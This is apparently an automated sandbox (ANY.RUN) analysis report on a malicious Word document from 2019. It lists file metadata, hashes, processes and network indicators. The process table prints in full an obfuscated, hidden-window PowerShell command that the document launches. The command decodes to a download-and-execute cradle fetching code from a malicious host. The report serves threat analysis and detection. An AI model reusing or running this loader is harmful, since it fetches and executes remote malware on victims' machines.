File name: | IT544988958254349990123418.doc |
Full analysis: | https://app.any.run/tasks/6b69af66-2882-43a3-9f92-7a850144e3d7 |
Verdict: | Malicious activity |
Analysis date: | October 09, 2019, 13:56:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Wed Sep 25 23:02:00 2019, Last Saved Time/Date: Mon Sep 30 18:52:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 2128662F021953BCEC6186873A6AE83E |
SHA1: | 9B04D092F28834C9176D4F325CBEF2774EE16033 |
SHA256: | ED3029EC4F606C6ACA6686AE173FFD570C6FD91736401F7B3A4D3C24882FDECD |
SSDEEP: | 1536:2C3hskRSSuclIyTPHkDD+WZbtxrtJ/nD:2IRSSuclIyoDDrP/ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:09:30 17:52:00 |
CreateDate: | 2019:09:25 22:02:00 |
TotalEditTime: | 3.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 3 |
LastModifiedBy: | Administrator |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Administrator |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2828 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\IT544988958254349990123418.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1896 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c function a($a){ return [char]$a; };$cwchw=''; 36,97,61,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,39,104,116,116,112,58,47,47,104,111,109,101,46,104,111,112,101,100,97,121,98,111,111,107,46,99,111,109,47,63,110,101,101,100,61,57,102,53,98,57,101,101,38,118,105,100,61,100,112,101,99,49,38,53,48,48,56,49,39,41,59,105,101,120,32,36,97,59|%{$zxbc=a($_);$cwchw+=$zxbc};iex $cwchw; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2828 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR64B0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X6WW200532GFXSFAV79Z.temp | — | |
MD5:— | SHA256:— | |||
1896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A272B20D1454EFE23A324E582F0E701D | SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 | |||
1896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF186d4b.TMP | binary | |
MD5:A272B20D1454EFE23A324E582F0E701D | SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 | |||
2828 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:236A5B013E0C0A530DFC8CB356246350 | SHA256:7A1B1040CF315213BF4432B06265B1A77F8A2373BF309F77BE71140CF7EBD1B9 | |||
2828 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$544988958254349990123418.doc | pgc | |
MD5:117996872F820E2B587D68D2C65108F1 | SHA256:F669821BDC190064B59393FFBF7E2CA9779DC397C11C25CF6DB7D34ED91FFF5C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1896 | powershell.exe | GET | — | 185.189.149.169:80 | http://home.hopedaybook.com/?need=9f5b9ee&vid=dpec1&50081 | CH | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1896 | powershell.exe | 185.189.149.169:80 | home.hopedaybook.com | SOFTplus Entwicklungen GmbH | CH | malicious |
Domain | IP | Reputation |
---|---|---|
home.hopedaybook.com |
| malicious |